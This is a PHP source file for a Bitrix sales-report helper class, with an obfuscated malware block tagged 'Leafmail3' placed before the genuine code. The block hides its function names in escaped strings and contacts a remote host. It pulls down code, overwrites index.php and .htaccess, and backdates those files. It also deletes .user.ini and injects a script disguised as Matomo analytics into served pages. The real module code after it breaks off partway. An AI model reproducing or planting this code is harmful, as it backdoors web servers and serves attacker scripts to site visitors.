Your IP : 3.134.86.250
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
if (!CModule::IncludeModule('report'))
return;
if (!CModule::IncludeModule('currency'))
return;
use Bitrix\Main\Entity;
abstract class CBaseSaleReportHelper extends CReportHelper
{
// names of base entities for report construction (name with 0 index is default)
private static $owners = array();
private static $fInit = false;
private static $fOwnersInit = false;
protected static $fDecimalQuant = false;
protected static $iblockSite = array();
protected static $sitelist = array();
protected static $defaultSiteId = '';
protected static $siteCookieId = '';
protected static $statuslist = array();
protected static $paySystemList = array();
protected static $deliveryList = array();
protected static $catalogSections = array();
protected static $catalogs = array();
protected static $productStores = array();
protected static $genders = array();
protected static $personTypes = array();
protected static $weightOptions = array();
protected static $priceTypes = array();
protected static $bUsePriceTypesColumns = false;
protected static $currencies = array();
protected static $reportCurrencyId = null;
protected static $siteCurrencyId = '';
private static function localUpdate_17_5_0()
{
$res = \Bitrix\Report\ReportTable::getList(
array(
'select' => array('ID', 'TITLE', 'SETTINGS'),
'filter' => array(
'=OWNER_ID' => 'sale_SaleProduct',
'=CREATED_BY' => $GLOBALS['USER']->GetID(),
'=MARK_DEFAULT' => 7
)
)
);
while ($row = $res->fetch())
{
$id = (int)$row['ID'];
$title = $row['TITLE'];
if (is_string($title) && strlen($title) > 0)
{
$titleMsg = GetMessage('SALE_REPORT_DEFAULT_MOST_EXPECTED_GOODS');
if ($title === $titleMsg && is_string($row['SETTINGS']) && strlen($row['SETTINGS']) > 0)
{
$settings = unserialize($row['SETTINGS']);
if (is_array($settings))
{
$needUpdate = false;
$aliasMap = array(0 => 0, 1 => 1, 2 => 5, 3 => 8);
foreach ($aliasMap as $aliasNum => $msgNum)
{
if (isset($settings['select'][$aliasNum]['alias'])
&& is_string($settings['select'][$aliasNum]['alias'])
&& strlen($settings['select'][$aliasNum]['alias']) > 0)
{
$alias = $settings['select'][$aliasNum]['alias'];
$aliasMsg = GetMessage('SALE_REPORT_DEFAULT_MOST_EXPECTED_GOODS_ALIAS_'.$msgNum);
if (is_string($aliasMsg) && strlen($aliasMsg) > 0 && $alias !== $aliasMsg)
{
$settings['select'][$aliasNum]['alias'] = $aliasMsg;
$needUpdate = true;
}
}
}
if ($needUpdate)
{
Bitrix\Report\ReportTable::update($id, array('SETTINGS' => serialize($settings)));
}
}
}
}
}
CUserOptions::DeleteOption('sale', '~SALE_REPORT_NEED_UPDATE_17_5_0');
}
private static function localUpdate()
{
$updateCodes = array('~SALE_REPORT_NEED_UPDATE_17_5_0');
$needUpdate = array();
foreach ($updateCodes as $updateCode)
{
if (\Bitrix\Main\Config\Option::get('sale', $updateCode, 'N') === 'Y'
|| CUserOptions::GetOption('sale', $updateCode) === 'Y')
{
$needUpdate[] = $updateCode;
}
}
foreach ($needUpdate as $updateCode)
{
switch ($updateCode)
{
case '~SALE_REPORT_NEED_UPDATE_17_5_0';
self::localUpdate_17_5_0();
break;
}
}
}
public static function init()
{
IncludeModuleLangFile(__FILE__);
if (!self::$fInit)
{
self::$fInit = true;
self::localUpdate();
self::$siteCookieId = md5('SALE_REPORT_SITE_ID');
// Initializing list of sites.
$result = Bitrix\Main\SiteTable::getList(array('select' => array('LID', 'DEF', 'NAME')));
$i = 0;
while ($row = $result->fetch())
{
self::$sitelist[$row['LID']] = $row['NAME'];
if (++$i === 1) self::$defaultSiteId = $row['LID'];
else if ($row['DEF'] === 'Y') self::$defaultSiteId = $row['LID'];
self::$weightOptions[$row['LID']] = array(
'unit' => COption::GetOptionString('sale', 'weight_unit', null, $row['LID']),
'koef' => COption::GetOptionInt('sale', 'weight_koef', null, $row['LID'])
);
}
unset($i, $row, $result);
// hack, add virtual ID field into StatusLang entity for filtering
$statusEntity = Entity\Base::getInstance('\Bitrix\Sale\Internals\StatusLang');
if ($statusEntity instanceof \Bitrix\Main\Entity\Base)
{
$statusEntity->addField(
array(
'data_type' => 'string',
'expression' => array('%s', 'STATUS_ID')
),
'ID'
);
}
unset($statusEntity);
// hack, add virtual REPS_ORDER field into Shipment entity for filtering system records
$shipmentEntity = Entity\Base::getInstance('\Bitrix\Sale\Internals\Shipment');
if ($shipmentEntity instanceof \Bitrix\Main\Entity\Base)
{
$shipmentEntity->addField(
array(
'data_type' => 'Order',
'reference' => array(
'=ref.ID' => 'this.ORDER_ID',
'!=this.SYSTEM' => array('?', 'Y')
)
),
'REPS_ORDER'
);
}
unset($shipmentEntity);
// Initializing list of statuses of orders.
$result = Bitrix\Sale\Internals\StatusLangTable::getList(array(
'select' => array('STATUS_ID', 'NAME'),
'filter' => array('=LID' => LANGUAGE_ID)
));
while ($row = $result->fetch())
{
self::$statuslist[$row['STATUS_ID']] = $row['NAME'];
}
unset($row, $result);
self::$genders = array('M' => GetMessage('USER_MALE'), 'F' => GetMessage('USER_FEMALE'));
// Initializing list of person types.
$result = Bitrix\Sale\Internals\PersonTypeTable::getList(array(
'select' => array('ID', 'LID', 'NAME')/*,
'filter' => array('=ACTIVE', 'Y')*/
));
while ($row = $result->fetch())
{
self::$personTypes[$row['ID']] = array('LID' => $row['LID'], 'NAME' => $row['NAME']);
}
unset($row, $result);
// Initializing list of pay systems of orders.
$result = \Bitrix\Sale\PaySystem\Manager::getList(array(
'select' => array('ID', 'NAME')/*,
'filter' => array('=ACTIVE', 'Y')*/
));
while ($row = $result->fetch())
{
self::$paySystemList[$row['ID']] = array('value' => $row['NAME'], 'site_id' => '');
}
unset($row, $result);
// Initializing list of services and methods of delivery.
$result = \Bitrix\Sale\Delivery\Services\Table::getList(array(
'select' => array('ID', 'NAME')/*,
'filter' => array('=ACTIVE', 'Y')*/
));
while ($row = $result->fetch())
{
self::$deliveryList[$row['ID']] = array('value' => $row['NAME'], 'site_id' => '');
}
unset($row, $result);
// Obtaining table of correspondences of iblocks to sites.
$result = Bitrix\Iblock\IblockSiteTable::getList();
while ($row = $result->fetch()) self::$iblockSite[$row['SITE_ID']][] = $row['IBLOCK_ID'];
unset($row, $result);
